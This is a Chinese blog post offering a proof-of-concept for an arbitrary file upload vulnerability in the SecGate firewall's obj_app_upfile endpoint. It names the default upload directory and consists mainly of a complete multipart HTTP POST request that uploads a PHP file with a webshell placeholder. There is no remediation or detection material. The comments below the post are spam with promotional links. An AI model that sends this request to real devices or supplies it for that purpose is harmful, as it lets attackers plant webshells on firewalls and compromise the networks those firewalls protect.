网神,SecGate ,obj_app_upfile,任意文件上传漏洞 POC

2023年08月16日 898阅读 5评论 1点赞

首页
/
网络安全
/
正文

默认上传路径

/secgate/webui/attachements/

访问 attachements/xxx.php 文件

POST /?g=obj_app_upfile HTTP/1.1
Host: x.x.x.x
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)

------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="vulntest.php"
Content-Type: text/plain

<?php php马?>

------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--

1赞

网神 SecGate防火墙漏洞

发布作者： m哥

百度收录：正在检测是否收录...

本文链接： https://testgo1.top/index.php/archives/5.html

作品采用：《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 》许可协议授权

—— 评论区 ——

@

azbbkemzgn
Windows 10 x64 Edition 搜狗高速浏览器

看的我热血沸腾啊

2024年09月23日 09:00
@

zckrfzngad
Windows 10 x64 Edition 搜狗高速浏览器

看的我热血沸腾啊https://www.ea55.com/

2024年10月04日 21:09
@

mytgvjwqel
Windows 10 x64 Edition 搜狗高速浏览器

想想你的文章写的特别好www.jiwenlaw.com

2024年10月05日 19:57
@

acfecomria
Windows 10 x64 Edition 搜狗高速浏览器

180战神复古传奇电脑版-玩法攻略：https://501h.com/fugu/1595.html

2024年11月16日 13:58
@

pmukfzzhau
Windows 10 x64 Edition 搜狗高速浏览器

哈哈哈，写的太好了https://www.lawjida.com/

2025年01月06日 14:54